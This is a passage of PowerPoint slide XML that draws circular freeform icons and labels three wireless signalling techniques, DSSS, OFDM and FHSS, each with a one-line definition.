                <a:gd name="T15" fmla="*/ 2005 h 2035"/>
                <a:gd name="T16" fmla="*/ 1085 w 2206"/>
                <a:gd name="T17" fmla="*/ 0 h 2035"/>
                <a:gd name="T18" fmla="*/ 1085 w 2206"/>
                <a:gd name="T19" fmla="*/ 0 h 2035"/>
                <a:gd name="T20" fmla="*/ 366 w 2206"/>
                <a:gd name="T21" fmla="*/ 297 h 2035"/>
                <a:gd name="T22" fmla="*/ 68 w 2206"/>
                <a:gd name="T23" fmla="*/ 1017 h 2035"/>
                <a:gd name="T24" fmla="*/ 366 w 2206"/>
                <a:gd name="T25" fmla="*/ 1737 h 2035"/>
                <a:gd name="T26" fmla="*/ 1085 w 2206"/>
                <a:gd name="T27" fmla="*/ 2034 h 2035"/>
                <a:gd name="T28" fmla="*/ 1085 w 2206"/>
                <a:gd name="T29" fmla="*/ 2034 h 2035"/>
                <a:gd name="T30" fmla="*/ 1805 w 2206"/>
                <a:gd name="T31" fmla="*/ 1737 h 2035"/>
                <a:gd name="T32" fmla="*/ 1805 w 2206"/>
                <a:gd name="T33" fmla="*/ 297 h 2035"/>
                <a:gd name="T34" fmla="*/ 1085 w 2206"/>
                <a:gd name="T35" fmla="*/ 0 h 2035"/>
                <a:gd name="T36" fmla="*/ 1085 w 2206"/>
                <a:gd name="T37" fmla="*/ 2005 h 20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06" h="2035">
                  <a:moveTo>
                    <a:pt x="1085" y="2005"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1085" y="2005"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="823" y="2005"/>
                    <a:pt x="571" y="1902"/>
                    <a:pt x="383" y="1714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1331"/>
                    <a:pt x="0" y="703"/>
                    <a:pt x="383" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="126"/>
                    <a:pt x="823" y="23"/>
                    <a:pt x="1085" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1354" y="23"/>
                    <a:pt x="1600" y="126"/>
                    <a:pt x="1788" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2177" y="703"/>
                    <a:pt x="2177" y="1331"/>
                    <a:pt x="1788" y="1714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1600" y="1902"/>
                    <a:pt x="1354" y="2005"/>
                    <a:pt x="1085" y="2005"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1085" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1085" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="817" y="0"/>
                    <a:pt x="560" y="103"/>
                    <a:pt x="366" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="486"/>
                    <a:pt x="68" y="743"/>
                    <a:pt x="68" y="1017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="1285"/>
                    <a:pt x="177" y="1542"/>
                    <a:pt x="366" y="1737"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="560" y="1925"/>
                    <a:pt x="817" y="2034"/>
                    <a:pt x="1085" y="2034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1085" y="2034"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1360" y="2034"/>
                    <a:pt x="1611" y="1925"/>
                    <a:pt x="1805" y="1737"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2205" y="1337"/>
                    <a:pt x="2205" y="691"/>
                    <a:pt x="1805" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1611" y="103"/>
                    <a:pt x="1360" y="0"/>
                    <a:pt x="1085" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1085" y="2005"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/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58" name="TextBox 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8456737" y="3347930"/>
            <a:ext cx="734460" cy="369314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</a:rPr>
              <a:t>DSSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="id-ID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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0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8441202" y="3680137"/>
            <a:ext cx="3357854" cy="909718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="109710" tIns="54855" rIns="109710" bIns="54855" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914217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MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>An original data signal multiplied with a pseudo-random noise spreading the code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Freeform 269"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3819445" y="4965645"/>
            <a:ext cx="633483" cy="576790"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 994 w 1989"/>
              <a:gd name="T1" fmla="*/ 0 h 1812"/>
              <a:gd name="T2" fmla="*/ 994 w 1989"/>
              <a:gd name="T3" fmla="*/ 0 h 1812"/>
              <a:gd name="T4" fmla="*/ 354 w 1989"/>
              <a:gd name="T5" fmla="*/ 268 h 1812"/>
              <a:gd name="T6" fmla="*/ 354 w 1989"/>
              <a:gd name="T7" fmla="*/ 1548 h 1812"/>
              <a:gd name="T8" fmla="*/ 994 w 1989"/>
              <a:gd name="T9" fmla="*/ 1811 h 1812"/>
              <a:gd name="T10" fmla="*/ 1634 w 1989"/>
              <a:gd name="T11" fmla="*/ 1548 h 1812"/>
              <a:gd name="T12" fmla="*/ 1634 w 1989"/>
              <a:gd name="T13" fmla="*/ 268 h 1812"/>
              <a:gd name="T14" fmla="*/ 994 w 1989"/>
              <a:gd name="T15" fmla="*/ 0 h 1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89" h="1812">
                <a:moveTo>
                  <a:pt x="994" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="994" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="766" y="0"/>
                  <a:pt x="532" y="91"/>
                  <a:pt x="354" y="268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="622"/>
                  <a:pt x="0" y="1194"/>
                  <a:pt x="354" y="1548"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="532" y="1725"/>
                  <a:pt x="766" y="1811"/>
                  <a:pt x="994" y="1811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1229" y="1811"/>
                  <a:pt x="1457" y="1725"/>
                  <a:pt x="1634" y="1548"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1988" y="1194"/>
                  <a:pt x="1988" y="622"/>
                  <a:pt x="1634" y="268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1457" y="91"/>
                  <a:pt x="1229" y="0"/>
                  <a:pt x="994" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent5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98" name="Freeform 270"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3789882" y="4930475"/>
            <a:ext cx="702462" cy="647130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1085 w 2206"/>
              <a:gd name="T1" fmla="*/ 2005 h 2035"/>
              <a:gd name="T2" fmla="*/ 1085 w 2206"/>
              <a:gd name="T3" fmla="*/ 2005 h 2035"/>
              <a:gd name="T4" fmla="*/ 383 w 2206"/>
              <a:gd name="T5" fmla="*/ 1714 h 2035"/>
              <a:gd name="T6" fmla="*/ 383 w 2206"/>
              <a:gd name="T7" fmla="*/ 314 h 2035"/>
              <a:gd name="T8" fmla="*/ 1085 w 2206"/>
              <a:gd name="T9" fmla="*/ 23 h 2035"/>
              <a:gd name="T10" fmla="*/ 1788 w 2206"/>
              <a:gd name="T11" fmla="*/ 314 h 2035"/>
              <a:gd name="T12" fmla="*/ 1788 w 2206"/>
              <a:gd name="T13" fmla="*/ 1714 h 2035"/>
              <a:gd name="T14" fmla="*/ 1085 w 2206"/>
              <a:gd name="T15" fmla="*/ 2005 h 2035"/>
              <a:gd name="T16" fmla="*/ 1085 w 2206"/>
              <a:gd name="T17" fmla="*/ 0 h 2035"/>
              <a:gd name="T18" fmla="*/ 1085 w 2206"/>
              <a:gd name="T19" fmla="*/ 0 h 2035"/>
              <a:gd name="T20" fmla="*/ 366 w 2206"/>
              <a:gd name="T21" fmla="*/ 297 h 2035"/>
              <a:gd name="T22" fmla="*/ 68 w 2206"/>
              <a:gd name="T23" fmla="*/ 1017 h 2035"/>
              <a:gd name="T24" fmla="*/ 366 w 2206"/>
              <a:gd name="T25" fmla="*/ 1737 h 2035"/>
              <a:gd name="T26" fmla="*/ 1085 w 2206"/>
              <a:gd name="T27" fmla="*/ 2034 h 2035"/>
              <a:gd name="T28" fmla="*/ 1085 w 2206"/>
              <a:gd name="T29" fmla="*/ 2034 h 2035"/>
              <a:gd name="T30" fmla="*/ 1805 w 2206"/>
              <a:gd name="T31" fmla="*/ 1737 h 2035"/>
              <a:gd name="T32" fmla="*/ 1805 w 2206"/>
              <a:gd name="T33" fmla="*/ 297 h 2035"/>
              <a:gd name="T34" fmla="*/ 1085 w 2206"/>
              <a:gd name="T35" fmla="*/ 0 h 2035"/>
              <a:gd name="T36" fmla="*/ 1085 w 2206"/>
              <a:gd name="T37" fmla="*/ 2005 h 20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206" h="2035">
                <a:moveTo>
                  <a:pt x="1085" y="2005"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1085" y="2005"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="823" y="2005"/>
                  <a:pt x="571" y="1902"/>
                  <a:pt x="383" y="1714"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1331"/>
                  <a:pt x="0" y="703"/>
                  <a:pt x="383" y="314"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="571" y="126"/>
                  <a:pt x="823" y="23"/>
                  <a:pt x="1085" y="23"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1354" y="23"/>
                  <a:pt x="1600" y="126"/>
                  <a:pt x="1788" y="314"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2177" y="703"/>
                  <a:pt x="2177" y="1331"/>
                  <a:pt x="1788" y="1714"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1600" y="1902"/>
                  <a:pt x="1354" y="2005"/>
                  <a:pt x="1085" y="2005"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1085" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="817" y="0"/>
                  <a:pt x="560" y="103"/>
                  <a:pt x="366" y="297"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="486"/>
                  <a:pt x="68" y="743"/>
                  <a:pt x="68" y="1017"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="1285"/>
                  <a:pt x="177" y="1542"/>
                  <a:pt x="366" y="1737"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="560" y="1925"/>
                  <a:pt x="817" y="2034"/>
                  <a:pt x="1085" y="2034"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1085" y="2034"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1360" y="2034"/>
                  <a:pt x="1611" y="1925"/>
                  <a:pt x="1805" y="1737"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2205" y="1337"/>
                  <a:pt x="2205" y="691"/>
                  <a:pt x="1805" y="297"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1611" y="103"/>
                  <a:pt x="1360" y="0"/>
                  <a:pt x="1085" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1085" y="2005"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent5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91" name="TextBox 90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2735474" y="4928123"/>
            <a:ext cx="955673" cy="369314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</a:rPr>
              <a:t>OFDM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392944" y="5266987"/>
            <a:ext cx="3303381" cy="638875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="109710" tIns="54855" rIns="109710" bIns="54855" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="914217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MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>Method of encoding digital data on multiple carrier frequencies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="108" name="Group 107"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7662767" y="4922307"/>
            <a:ext cx="702462" cy="647130"/>
            <a:chOff x="13296063" y="10607541"/>
            <a:chExt cx="1265763" cy="1166060"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="110" name="Freeform 269"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13349333" y="10670914"/>
              <a:ext cx="1141470" cy="1039314"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 994 w 1989"/>
                <a:gd name="T1" fmla="*/ 0 h 1812"/>
                <a:gd name="T2" fmla="*/ 994 w 1989"/>
                <a:gd name="T3" fmla="*/ 0 h 1812"/>
                <a:gd name="T4" fmla="*/ 354 w 1989"/>
                <a:gd name="T5" fmla="*/ 268 h 1812"/>
                <a:gd name="T6" fmla="*/ 354 w 1989"/>
                <a:gd name="T7" fmla="*/ 1548 h 1812"/>
                <a:gd name="T8" fmla="*/ 994 w 1989"/>
                <a:gd name="T9" fmla="*/ 1811 h 1812"/>
                <a:gd name="T10" fmla="*/ 1634 w 1989"/>
                <a:gd name="T11" fmla="*/ 1548 h 1812"/>
                <a:gd name="T12" fmla="*/ 1634 w 1989"/>
                <a:gd name="T13" fmla="*/ 268 h 1812"/>
                <a:gd name="T14" fmla="*/ 994 w 1989"/>
                <a:gd name="T15" fmla="*/ 0 h 1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89" h="1812">
                  <a:moveTo>
                    <a:pt x="994" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="994" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="766" y="0"/>
                    <a:pt x="532" y="91"/>
                    <a:pt x="354" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="622"/>
                    <a:pt x="0" y="1194"/>
                    <a:pt x="354" y="1548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="532" y="1725"/>
                    <a:pt x="766" y="1811"/>
                    <a:pt x="994" y="1811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="1811"/>
                    <a:pt x="1457" y="1725"/>
                    <a:pt x="1634" y="1548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1988" y="1194"/>
                    <a:pt x="1988" y="622"/>
                    <a:pt x="1634" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1457" y="91"/>
                    <a:pt x="1229" y="0"/>
                    <a:pt x="994" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/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1" name="Freeform 270"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13296063" y="10607541"/>
              <a:ext cx="1265763" cy="1166060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1085 w 2206"/>
                <a:gd name="T1" fmla="*/ 2005 h 2035"/>
                <a:gd name="T2" fmla="*/ 1085 w 2206"/>
                <a:gd name="T3" fmla="*/ 2005 h 2035"/>
                <a:gd name="T4" fmla="*/ 383 w 2206"/>
                <a:gd name="T5" fmla="*/ 1714 h 2035"/>
                <a:gd name="T6" fmla="*/ 383 w 2206"/>
                <a:gd name="T7" fmla="*/ 314 h 2035"/>
                <a:gd name="T8" fmla="*/ 1085 w 2206"/>
                <a:gd name="T9" fmla="*/ 23 h 2035"/>
                <a:gd name="T10" fmla="*/ 1788 w 2206"/>
                <a:gd name="T11" fmla="*/ 314 h 2035"/>
                <a:gd name="T12" fmla="*/ 1788 w 2206"/>
                <a:gd name="T13" fmla="*/ 1714 h 2035"/>
                <a:gd name="T14" fmla="*/ 1085 w 2206"/>
                <a:gd name="T15" fmla="*/ 2005 h 2035"/>
                <a:gd name="T16" fmla="*/ 1085 w 2206"/>
                <a:gd name="T17" fmla="*/ 0 h 2035"/>
                <a:gd name="T18" fmla="*/ 1085 w 2206"/>
                <a:gd name="T19" fmla="*/ 0 h 2035"/>
                <a:gd name="T20" fmla="*/ 366 w 2206"/>
                <a:gd name="T21" fmla="*/ 297 h 2035"/>
                <a:gd name="T22" fmla="*/ 68 w 2206"/>
                <a:gd name="T23" fmla="*/ 1017 h 2035"/>
                <a:gd name="T24" fmla="*/ 366 w 2206"/>
                <a:gd name="T25" fmla="*/ 1737 h 2035"/>
                <a:gd name="T26" fmla="*/ 1085 w 2206"/>
                <a:gd name="T27" fmla="*/ 2034 h 2035"/>
                <a:gd name="T28" fmla="*/ 1085 w 2206"/>
                <a:gd name="T29" fmla="*/ 2034 h 2035"/>
                <a:gd name="T30" fmla="*/ 1805 w 2206"/>
                <a:gd name="T31" fmla="*/ 1737 h 2035"/>
                <a:gd name="T32" fmla="*/ 1805 w 2206"/>
                <a:gd name="T33" fmla="*/ 297 h 2035"/>
                <a:gd name="T34" fmla="*/ 1085 w 2206"/>
                <a:gd name="T35" fmla="*/ 0 h 2035"/>
                <a:gd name="T36" fmla="*/ 1085 w 2206"/>
                <a:gd name="T37" fmla="*/ 2005 h 20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06" h="2035">
                  <a:moveTo>
                    <a:pt x="1085" y="2005"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1085" y="2005"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="823" y="2005"/>
                    <a:pt x="571" y="1902"/>
                    <a:pt x="383" y="1714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1331"/>
                    <a:pt x="0" y="703"/>
                    <a:pt x="383" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="126"/>
                    <a:pt x="823" y="23"/>
                    <a:pt x="1085" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1354" y="23"/>
                    <a:pt x="1600" y="126"/>
                    <a:pt x="1788" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2177" y="703"/>
                    <a:pt x="2177" y="1331"/>
                    <a:pt x="1788" y="1714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1600" y="1902"/>
                    <a:pt x="1354" y="2005"/>
                    <a:pt x="1085" y="2005"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1085" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1085" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="817" y="0"/>
                    <a:pt x="560" y="103"/>
                    <a:pt x="366" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="486"/>
                    <a:pt x="68" y="743"/>
                    <a:pt x="68" y="1017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="1285"/>
                    <a:pt x="177" y="1542"/>
                    <a:pt x="366" y="1737"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="560" y="1925"/>
                    <a:pt x="817" y="2034"/>
                    <a:pt x="1085" y="2034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1085" y="2034"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1360" y="2034"/>
                    <a:pt x="1611" y="1925"/>
                    <a:pt x="1805" y="1737"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2205" y="1337"/>
                    <a:pt x="2205" y="691"/>
                    <a:pt x="1805" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1611" y="103"/>
                    <a:pt x="1360" y="0"/>
                    <a:pt x="1085" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1085" y="2005"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/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101" name="TextBox 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8456736" y="4930275"/>
            <a:ext cx="752093" cy="369314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</a:rPr>
              <a:t>FHSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="id-ID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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="TextBox 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8441202" y="5262482"/>
            <a:ext cx="3357854" cy="909718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="109710" tIns="54855" rIns="109710" bIns="54855" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914217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MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>A method of transmitting radio signals by rapidly switching a carrier among many frequency channels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Freeform 269"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3819445" y="1872138"/>
            <a:ext cx="633483" cy="576790"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 994 w 1989"/>
              <a:gd name="T1" fmla="*/ 0 h 1812"/>
              <a:gd name="T2" fmla="*/ 994 w 1989"/>
              <a:gd name="T3" fmla="*/ 0 h 1812"/>
              <a:gd name="T4" fmla="*/ 354 w 1989"/>
              <a:gd name="T5" fmla="*/ 268 h 1812"/>
              <a:gd name="T6" fmla="*/ 354 w 1989"/>
              <a:gd name="T7" fmla="*/ 1548 h 1812"/>
              <a:gd name="T8" fmla="*/ 994 w 1989"/>
              <a:gd name="T9" fmla="*/ 1811 h 1812"/>
              <a:gd name="T10" fmla="*/ 1634 w 1989"/>
              <a:gd name="T11" fmla="*/ 1548 h 1812"/>
              <a:gd name="T12" fmla="*/ 1634 w 1989"/>
              <a:gd name="T13" fmla="*/ 268 h 1812"/>
              <a:gd name="T14" fmla="*/ 994 w 1989"/>
              <a:gd name="T15" fmla="*/ 0 h 1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89" h="1812">
                <a:moveTo>
                  <a:pt x="994" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="994" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="766" y="0"/>
                  <a:pt x="532" y="91"/>
                  <a:pt x="354" y="268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="622"/>
                  <a:pt x="0" y="1194"/>
                  <a:pt x="354" y="1548"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="532" y="1725"/>
                  <a:pt x="766" y="1811"/>
                  <a:pt x="994" y="1811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1229" y="1811"/>
                  <a:pt x="1457" y="1725"/>
                  <a:pt x="1634" y="1548"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1988" y="1194"/>
                  <a:pt x="1988" y="622"/>
                  <a:pt x="1634" y="268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1457" y="91"/>
                  <a:pt x="1229" y="0"/>
                  <a:pt x="994" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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123" name="Freeform 270"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3789882" y="1836968"/>
            <a:ext cx="702462" cy="647130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1085 w 2206"/>
              <a:gd name="T1" fmla="*/ 2005 h 2035"/>
              <a:gd name="T2" fmla="*/ 1085 w 2206"/>
              <a:gd name="T3" fmla="*/ 2005 h 2035"/>
              <a:gd name="T4" fmla="*/ 383 w 2206"/>
              <a:gd name="T5" fmla="*/ 1714 h 2035"/>
              <a:gd name="T6" fmla="*/ 383 w 2206"/>
              <a:gd name="T7" fmla="*/ 314 h 2035"/>
              <a:gd name="T8" fmla="*/ 1085 w 2206"/>
              <a:gd name="T9" fmla="*/ 23 h 2035"/>
              <a:gd name="T10" fmla="*/ 1788 w 2206"/>
              <a:gd name="T11" fmla="*/ 314 h 2035"/>
              <a:gd name="T12" fmla="*/ 1788 w 2206"/>
              <a:gd name="T13" fmla="*/ 1714 h 2035"/>
              <a:gd name="T14" fmla="*/ 1085 w 2206"/>
              <a:gd name="T15" fmla="*/ 2005 h 2035"/>
              <a:gd name="T16" fmla="*/ 1085 w 2206"/>
              <a:gd name="T17" fmla="*/ 0 h 2035"/>
              <a:gd name="T18" fmla="*/ 1085 w 2206"/>
              <a:gd name="T19" fmla="*/ 0 h 2035"/>
              <a:gd name="T20" fmla="*/ 366 w 2206"/>
              <a:gd name="T21" fmla="*/ 297 h 2035"/>
              <a:gd name="T22" fmla="*/ 68 w 2206"/>
              <a:gd name="T23" fmla="*/ 1017 h 2035"/>
              <a:gd name="T24" fmla="*/ 366 w 2206"/>
              <a:gd name="T25" fmla="*/ 1737 h 2035"/>
              <a:gd name="T26" fmla="*/ 1085 w 2206"/>
              <a:gd name="T27" fmla="*/ 2034 h 2035"/>
              <a:gd name="T28" fmla="*/ 1085 w 2206"/>
              <a:gd name="T29" fmla="*/ 2034 h 2035"/>
              <a:gd name="T30" fmla="*/ 1805 w 2206"/>
              <a:gd name="T31" fmla="*/ 1737 h 2035"/>
              <a:gd name="T32" fmla="*/ 1805 w 2206"/>
              <a:gd name="T33" fmla="*/ 297 h 2035"/>
              <a:gd name="T34" fmla="*/ 1085 w 2206"/>
              <a:gd name="T35" fmla="*/ 0 h 2035"/>
              <a:gd name="T36" fmla="*/ 1085 w 2206"/>
